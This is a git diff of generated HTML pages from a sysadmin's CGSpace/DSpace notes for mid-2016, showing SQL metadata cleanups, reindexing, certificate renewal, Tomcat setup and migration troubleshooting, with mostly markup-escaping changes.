dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security' and confidence != 500;
dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39; and confidence != 500;
count
-------
253
@ -194,14 +194,14 @@ dspacetest=# select count(*) from metadatavalue where metadata_field_id=3 and te
</code></pre><ul>
<li>Trying something experimental:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set confidence=500 where metadata_field_id=3 and text_value like &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>And then re-indexing authority and Discovery&hellip;?</li>
<li>After Discovery reindex the CCAFS authors are all together in the Authors sidebar facet</li>
<li>The docs for the ORCiD and Authority stuff for DSpace 5 mention changing the browse indexes to use the Authority as well:</li>
</ul>
<pre><code>webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
<pre tabindex="0"><code>webui.browse.index.2 = author:metadataAuthority:dc.contributor.author:authority
</code></pre><ul>
<li>That would only be for the &ldquo;Browse by&rdquo; function&hellip; so we&rsquo;ll have to see what effect that has later</li>
</ul>
@ -215,7 +215,7 @@ UPDATE 960
<ul>
<li>Figured out how to export a list of the unique values from a metadata field ordered by count:</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=29 group by text_value order by count desc) to /tmp/sponsorship.csv with csv;
</code></pre><ul>
<li>
<p>Identified the next round of fields to migrate:</p>
@ -244,7 +244,7 @@ UPDATE 960
<li>Looks like this is all we need: <a href="https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies">https://wiki.lyrasis.org/display/DSDOC5x/Submission+User+Interface#SubmissionUserInterface-ConfiguringControlledVocabularies</a></li>
<li>I wrote an XPath expression to extract the ILRI subjects from <code>input-forms.xml</code> (from the xmlstarlet package):</li>
</ul>
<pre><code>$ xml sel -t -m '//value-pairs[@value-pairs-name=&quot;ilrisubject&quot;]/pair/displayed-value/text()' -c '.' -n dspace/config/input-forms.xml
<pre tabindex="0"><code>$ xml sel -t -m &#39;//value-pairs[@value-pairs-name=&#34;ilrisubject&#34;]/pair/displayed-value/text()&#39; -c &#39;.&#39; -n dspace/config/input-forms.xml
</code></pre><ul>
<li>Write to Atmire about the use of <code>atmire.orcid.id</code> to see if we can change it</li>
<li>Seems to be a virtual field that is queried from the authority cache&hellip; hmm</li>
@ -263,9 +263,9 @@ UPDATE 960
<li>It looks like the values are documented in <code>Choices.java</code></li>
<li>Experiment with setting all 960 CCAFS author values to be 500:</li>
</ul>
<pre><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
<pre tabindex="0"><code>dspacetest=# SELECT authority, confidence FROM metadatavalue WHERE resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = 'CGIAR Research Program on Climate Change, Agriculture and Food Security';
dspacetest=# UPDATE metadatavalue set confidence = 500 where resource_type_id=2 AND metadata_field_id=3 AND text_value = &#39;CGIAR Research Program on Climate Change, Agriculture and Food Security&#39;;
UPDATE 960
</code></pre><ul>
<li>After the database edit, I did a full Discovery re-index</li>
@ -320,7 +320,7 @@ UPDATE 960
<ul>
<li>CGSpace&rsquo;s HTTPS certificate expired last night and I didn&rsquo;t notice, had to renew:</li>
</ul>
<pre><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &quot;/usr/bin/service nginx stop&quot; --post-hook &quot;/usr/bin/service nginx start&quot;
<pre tabindex="0"><code># /opt/letsencrypt/letsencrypt-auto renew --standalone --pre-hook &#34;/usr/bin/service nginx stop&#34; --post-hook &#34;/usr/bin/service nginx start&#34;
</code></pre><ul>
<li>I really need to fix that cron job&hellip;</li>
</ul>
@ -328,8 +328,8 @@ UPDATE 960
<ul>
<li>Run the replacements/deletes for <code>dc.description.sponsorship</code> (investors) on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t 'correct investor' -m 29 -d cgspace -p 'fuuu' -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p 'fuuu' -u cgspace
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i investors-not-blank-not-delete-85.csv -f dc.description.sponsorship -t &#39;correct investor&#39; -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
$ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.sponsorship -m 29 -d cgspace -p &#39;fuuu&#39; -u cgspace
</code></pre><ul>
<li>The scripts for this are here:
<ul>
@ -346,7 +346,7 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
<li>There are still ~97 fields for which no action was indicated</li>
<li>After the above deletions and replacements I regenerated a CSV and sent it to Peter <em>et al</em> to have a look</li>
</ul>
<pre><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
<pre tabindex="0"><code>dspacetest=# \copy (select text_value, count(*) from metadatavalue where resource_type_id=2 and metadata_field_id=126 group by text_value order by count desc) to /tmp/contributors-june28.csv with csv;
</code></pre><ul>
<li>Re-evaluate <code>dc.contributor.corporate</code> and it seems we will move it to <code>dc.contributor.author</code> as this is more in line with how editors are actually using it</li>
</ul>
@ -354,7 +354,7 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
<ul>
<li>Test run of <code>migrate-fields.sh</code> with the following re-mappings:</li>
</ul>
<pre><code>72 55 #dc.source
<pre tabindex="0"><code>72 55 #dc.source
86 230 #cg.contributor.crp
91 211 #cg.contributor.affiliation
94 212 #cg.species
@ -367,9 +367,9 @@ $ ./delete-metadata-values.py -i investors-delete-82.csv -f dc.description.spons
</code></pre><ul>
<li>Run all cleanups and deletions of <code>dc.contributor.corporate</code> on CGSpace:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t 'Correct style' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t 'should be' -m 126 -d cgspace -u cgspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Corporate-Authors-Fix-121.csv -f dc.contributor.corporate -t &#39;Correct style&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Corporate-Authors-Fix-PB.csv -f dc.contributor.corporate -t &#39;should be&#39; -m 126 -d cgspace -u cgspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-Delete-13.csv -m 126 -u cgspace -d cgspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>Re-deploy CGSpace and DSpace Test with latest June changes</li>
<li>Now the sharing and Altmetric bits are more prominent:</li>
@ -383,11 +383,11 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ul>
<li>Wow, there are 95 authors in the database who have &lsquo;,&rsquo; at the end of their name:</li>
</ul>
<pre><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like '%,';
<pre tabindex="0"><code># select text_value from metadatavalue where metadata_field_id=3 and text_value like &#39;%,&#39;;
</code></pre><ul>
<li>We need to use something like this to fix them, need to write a proper regex later:</li>
</ul>
<pre><code># update metadatavalue set text_value = regexp_replace(text_value, '(Poole, J),', '\1') where metadata_field_id=3 and text_value = 'Poole, J,';
<pre tabindex="0"><code># update metadatavalue set text_value = regexp_replace(text_value, &#39;(Poole, J),&#39;, &#39;\1&#39;) where metadata_field_id=3 and text_value = &#39;Poole, J,&#39;;
</code></pre>
@ -409,15 +409,15 @@ $ ./delete-metadata-values.py -f dc.contributor.corporate -i Corporate-Authors-D
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -44,7 +44,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
In this case the select query was showing 95 results before the update
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -74,12 +74,12 @@ In this case the select query was showing 95 results before the update
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -126,7 +126,7 @@ In this case the select query was showing 95 results before the update
<time datetime="2016-07-01T10:53:00+03:00">Fri Jul 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -135,9 +135,9 @@ In this case the select query was showing 95 results before the update
<li>Add <code>dc.description.sponsorship</code> to Discovery sidebar facets and make investors clickable in item view (<a href="https://github.com/ilri/DSpace/issues/232">#232</a>)</li>
<li>I think this query should find and replace all authors that have &ldquo;,&rdquo; at the end of their names:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, '(^.+?),$', '\1') where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;(^.+?),$&#39;, &#39;\1&#39;) where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
UPDATE 95
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ '^.+?,$';
dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and resource_type_id=2 and text_value ~ &#39;^.+?,$&#39;;
text_value
------------
(0 rows)
@ -158,7 +158,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<li>We <em>really</em> only need <code>statistics</code> and <code>authority</code> but meh</li>
<li>Fix metadata for species on DSpace Test:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 94 -d dspacetest -u dspacetest -p &#39;fuuu&#39;
</code></pre><ul>
<li>Will run later on CGSpace</li>
<li>A user is still having problems with Sherpa/Romeo causing crashes during the submission process when the journal is &ldquo;ungraded&rdquo;</li>
@ -169,7 +169,7 @@ dspacetest=# select text_value from metadatavalue where metadata_field_id=3 and
<ul>
<li>Delete 23 blank metadata values from CGSpace:</li>
</ul>
<pre><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value='';
<pre tabindex="0"><code>cgspace=# delete from metadatavalue where resource_type_id=2 and text_value=&#39;&#39;;
DELETE 23
</code></pre><ul>
<li>Complete phase three of metadata migration, for the following fields:
@ -188,9 +188,9 @@ DELETE 23
</li>
<li>Also, run fixes and deletes for species and author affiliations (over 1000 corrections!)</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p 'fuuu'
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p 'fuuu'
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p 'fuuu'
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i Species-Peter-Fix.csv -f dc.Species -t CORRECT -m 212 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./fix-metadata-values.py -i Affiliations-Fix-1045-Peter-Abenet.csv -f dc.contributor.affiliation -t Correct -m 211 -d dspace -u dspace -p &#39;fuuu&#39;
$ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Delete-Peter-Abenet.csv -m 211 -u dspace -d dspace -p &#39;fuuu&#39;
</code></pre><ul>
<li>I then ran all server updates and rebooted the server</li>
</ul>
@ -198,7 +198,7 @@ $ ./delete-metadata-values.py -f dc.contributor.affiliation -i Affiliations-Dele
<ul>
<li>Doing some author cleanups from Peter and Abenet:</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/Authors-Fix-205-UTF8.csv -f dc.contributor.author -t correct -m 3 -d dspacetest -u dspacetest -p fuuu
$ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UTF8.csv -m 3 -u dspacetest -d dspacetest -p fuuu
</code></pre><h2 id="2016-07-13">2016-07-13</h2>
<ul>
@ -215,20 +215,20 @@ $ ./delete-metadata-values.py -f dc.contributor.author -i /tmp/Authors-Delete-UT
<li>Add species and breed to the XMLUI item display</li>
<li>CGSpace crashed late at night and the DSpace logs were showing:</li>
</ul>
<pre><code>2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2016-07-18 20:26:30,941 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error Timeout waiting for idle object
...
</code></pre><ul>
<li>I suspect it&rsquo;s someone hitting REST too much:</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log | sort -n | uniq -c | sort -h | tail -n 3
710 66.249.78.38
1781 181.118.144.29
24904 70.32.99.142
</code></pre><ul>
<li>I just blocked access to <code>/rest</code> for that last IP for now:</li>
</ul>
<pre><code> # log rest requests
<pre tabindex="0"><code> # log rest requests
location /rest {
access_log /var/log/nginx/rest.log;
proxy_pass http://127.0.0.1:8443;
@ -248,23 +248,23 @@ org.apache.commons.dbcp.SQLNestedException: Cannot get a connection, pool error
<li>We might need to use <code>index.authority.ignore-prefered=true</code> to tell the Discovery index to prefer the variation that exists in the metadatavalue rather than what it finds in the authority cache.</li>
<li>Trying these on DSpace Test after a discussion by Daniel Scharon on the dspace-tech mailing list:</li>
</ul>
<pre><code>index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
index.authority.ignore-variants.dc.contributor.author=false
</code></pre><ul>
<li>After reindexing I don&rsquo;t see any change in Discovery&rsquo;s display of authors, and still have entries like:</li>
</ul>
<pre><code>Grace, D. (464)
<pre tabindex="0"><code>Grace, D. (464)
Grace, D. (62)
</code></pre><ul>
<li>I asked for clarification of the following options on the DSpace mailing list:</li>
</ul>
<pre><code>index.authority.ignore
<pre tabindex="0"><code>index.authority.ignore
index.authority.ignore-prefered
index.authority.ignore-variants
</code></pre><ul>
<li>In the meantime, I will try these on DSpace Test (plus a reindex):</li>
</ul>
<pre><code>index.authority.ignore=true
<pre tabindex="0"><code>index.authority.ignore=true
index.authority.ignore-prefered=true
index.authority.ignore-variants=true
</code></pre><ul>
@ -272,7 +272,7 @@ index.authority.ignore-variants=true
<li>It was misconfigured and disabled, but already working for some reason <em>sigh</em></li>
<li>&hellip; no luck. Trying with just:</li>
</ul>
<pre><code>index.authority.ignore=true
<pre tabindex="0"><code>index.authority.ignore=true
</code></pre><ul>
<li>After re-indexing and clearing the XMLUI cache nothing has changed</li>
</ul>
@ -280,7 +280,7 @@ index.authority.ignore-variants=true
<ul>
<li>Trying a few more settings (plus reindex) for Discovery on DSpace Test:</li>
</ul>
<pre><code>index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>index.authority.ignore-prefered.dc.contributor.author=true
index.authority.ignore-variants=true
</code></pre><ul>
<li>Run all OS updates and reboot DSpace Test server</li>
@ -291,7 +291,7 @@ index.authority.ignore-variants=true
<ul>
<li>The DSpace source code mentions the configuration key <code>discovery.index.authority.ignore-prefered.*</code> (with prefix of discovery, despite the docs saying otherwise), so I&rsquo;m trying the following on DSpace Test:</li>
</ul>
<pre><code>discovery.index.authority.ignore-prefered.dc.contributor.author=true
<pre tabindex="0"><code>discovery.index.authority.ignore-prefered.dc.contributor.author=true
discovery.index.authority.ignore-variants=true
</code></pre><ul>
<li>Still no change!</li>
@ -325,15 +325,15 @@ discovery.index.authority.ignore-variants=true
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>

View File

@ -42,7 +42,7 @@ $ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -72,12 +72,12 @@ $ git rebase -i dspace-5.5
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -124,7 +124,7 @@ $ git rebase -i dspace-5.5
<time datetime="2016-08-01T15:53:00+03:00">Mon Aug 01, 2016</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -137,7 +137,7 @@ $ git rebase -i dspace-5.5
<li>Anything after Bootstrap 3.3.1 makes glyphicons disappear (HTTP 404 trying to access from incorrect path of <code>fonts</code>)</li>
<li>Start working on DSpace 5.1 → 5.5 port:</li>
</ul>
<pre><code>$ git checkout -b 55new 5_x-prod
<pre tabindex="0"><code>$ git checkout -b 55new 5_x-prod
$ git reset --hard ilri/5_x-prod
$ git rebase -i dspace-5.5
</code></pre><ul>
@ -166,7 +166,7 @@ $ git rebase -i dspace-5.5
<li>Fix item display incorrectly displaying Species when Breeds were present (<a href="https://github.com/ilri/DSpace/pull/260">#260</a>)</li>
<li>Experiment with fixing more authors, like Delia Grace:</li>
</ul>
<pre><code>dspacetest=# update metadatavalue set authority='0b4fcbc1-d930-4319-9b4d-ea1553cca70b', confidence=600 where metadata_field_id=3 and text_value='Grace, D.';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where metadata_field_id=3 and text_value=&#39;Grace, D.&#39;;
</code></pre><h2 id="2016-08-06">2016-08-06</h2>
<ul>
<li>Finally figured out how to remove &ldquo;View/Open&rdquo; and &ldquo;Bitstreams&rdquo; from the item view</li>
@ -184,15 +184,15 @@ $ git rebase -i dspace-5.5
<li>Install latest Oracle Java 8 JDK</li>
<li>Create <code>setenv.sh</code> in Tomcat 8 <code>libexec/bin</code> directory:</li>
</ul>
<pre><code>CATALINA_OPTS=&quot;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&quot;
CATALINA_OPTS=&quot;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&quot;
<pre tabindex="0"><code>CATALINA_OPTS=&#34;-Djava.awt.headless=true -Xms3072m -Xmx3072m -XX:+UseConcMarkSweepGC -XX:+CMSIncrementalMode -Dfile.encoding=UTF-8&#34;
CATALINA_OPTS=&#34;$CATALINA_OPTS -Djava.library.path=/opt/brew/Cellar/tomcat-native/1.2.8/lib&#34;
JRE_HOME=/Library/Java/JavaVirtualMachines/jdk1.8.0_102.jdk/Contents/Home
</code></pre><ul>
<li>Edit Tomcat 8 <code>server.xml</code> to add regular HTTP listener for solr</li>
<li>Symlink webapps:</li>
</ul>
<pre><code>$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
<pre tabindex="0"><code>$ rm -rf /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
$ ln -sv ~/dspace/webapps/xmlui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/ROOT
$ ln -sv ~/dspace/webapps/oai /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/oai
$ ln -sv ~/dspace/webapps/jspui /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/jspui
@ -246,7 +246,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<li>Fix &ldquo;CONGO,DR&rdquo; country name in <code>input-forms.xml</code> (<a href="https://github.com/ilri/DSpace/pull/264">#264</a>)</li>
<li>Also need to fix existing records using the incorrect form in the database:</li>
</ul>
<pre><code>dspace=# update metadatavalue set text_value='CONGO, DR' where resource_type_id=2 and metadata_field_id=228 and text_value='CONGO,DR';
<pre tabindex="0"><code>dspace=# update metadatavalue set text_value=&#39;CONGO, DR&#39; where resource_type_id=2 and metadata_field_id=228 and text_value=&#39;CONGO,DR&#39;;
</code></pre><ul>
<li>I asked a question on the DSpace mailing list about updating &ldquo;preferred&rdquo; forms of author names from ORCID</li>
</ul>
@ -262,7 +262,7 @@ $ ln -sv ~/dspace/webapps/solr /opt/brew/Cellar/tomcat/8.5.4/libexec/webapps/sol
<ul>
<li>Database migrations are fine on DSpace 5.1:</li>
</ul>
<pre><code>$ ~/dspace/bin/dspace database info
<pre tabindex="0"><code>$ ~/dspace/bin/dspace database info
Database URL: jdbc:postgresql://localhost:5432/dspacetest
Database Schema: public
@ -300,12 +300,12 @@ Database Driver: PostgreSQL Native Driver version PostgreSQL 9.1 JDBC4 (build 90
<li>Talk to Atmire about the DSpace 5.5 issue, and it seems to be caused by a bug in FlywayDB</li>
<li>They said I should delete the Atmire migrations</li>
</ul>
<pre><code>dspacetest=# delete from schema_version where description = 'Atmire CUA 4 migration' and version='5.1.2015.12.03.2';
dspacetest=# delete from schema_version where description = 'Atmire MQM migration' and version='5.1.2015.12.03.3';
<pre tabindex="0"><code>dspacetest=# delete from schema_version where description = &#39;Atmire CUA 4 migration&#39; and version=&#39;5.1.2015.12.03.2&#39;;
dspacetest=# delete from schema_version where description = &#39;Atmire MQM migration&#39; and version=&#39;5.1.2015.12.03.3&#39;;
</code></pre><ul>
<li>After that DSpace starts up but XMLUI now has unrelated issues that I need to solve!</li>
</ul>
<pre><code>org.apache.avalon.framework.configuration.ConfigurationException: Type 'ThemeResourceReader' does not exist for 'map:read' at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
<pre tabindex="0"><code>org.apache.avalon.framework.configuration.ConfigurationException: Type &#39;ThemeResourceReader&#39; does not exist for &#39;map:read&#39; at jndi:/localhost/themes/0_CGIAR/sitemap.xmap:136:77
context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
</code></pre><ul>
<li>Looks like we&rsquo;re missing some stuff in the XMLUI module&rsquo;s <code>sitemap.xmap</code>, as well as in each of our XMLUI themes</li>
@ -324,18 +324,18 @@ context:/jndi:/localhost/themes/0_CGIAR/sitemap.xmap - 136:77
<li>Clean up and import 48 CCAFS records into DSpace Test</li>
<li>SQL to get all journal titles from dc.source (55), since it&rsquo;s apparently used for internal DSpace filename shit, but we moved all our journal titles there a few months ago:</li>
</ul>
<pre><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ '.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*';
<pre tabindex="0"><code>dspacetest=# select distinct text_value from metadatavalue where metadata_field_id=55 and text_value !~ &#39;.*(\.pdf|\.png|\.PDF|\.Pdf|\.JPEG|\.jpg|\.JPG|\.jpeg|\.xls|\.rtf|\.docx?|\.potx|\.dotx|\.eqa|\.tiff|\.mp4|\.mp3|\.gif|\.zip|\.txt|\.pptx|\.indd|\.PNG|\.bmp|\.exe|org\.dspace\.app\.mediafilter).*&#39;;
</code></pre><h2 id="2016-08-25">2016-08-25</h2>
<ul>
<li>Atmire suggested adding a missing bean to <code>dspace/config/spring/api/atmire-cua.xml</code> but it doesn&rsquo;t help:</li>
</ul>
<pre><code>...
Error creating bean with name 'MetadataStorageInfoService'
<pre tabindex="0"><code>...
Error creating bean with name &#39;MetadataStorageInfoService&#39;
...
</code></pre><ul>
<li>Atmire sent an updated version of <code>dspace/config/spring/api/atmire-cua.xml</code> and now XMLUI starts but gives a null pointer exception:</li>
</ul>
<pre><code>Java stacktrace: java.lang.NullPointerException
<pre tabindex="0"><code>Java stacktrace: java.lang.NullPointerException
at org.dspace.app.xmlui.aspect.statistics.Navigation.addOptions(Navigation.java:129)
at org.dspace.app.xmlui.wing.AbstractWingTransformer.startElement(AbstractWingTransformer.java:228)
at sun.reflect.GeneratedMethodAccessor126.invoke(Unknown Source)
@ -350,8 +350,8 @@ Error creating bean with name 'MetadataStorageInfoService'
</code></pre><ul>
<li>Import the 47 CCAFS records to CGSpace, creating the SimpleArchiveFormat bundles and importing like:</li>
</ul>
<pre><code>$ ./safbuilder.sh -c /tmp/Thumbnails\ to\ Upload\ to\ CGSpace/3546.csv
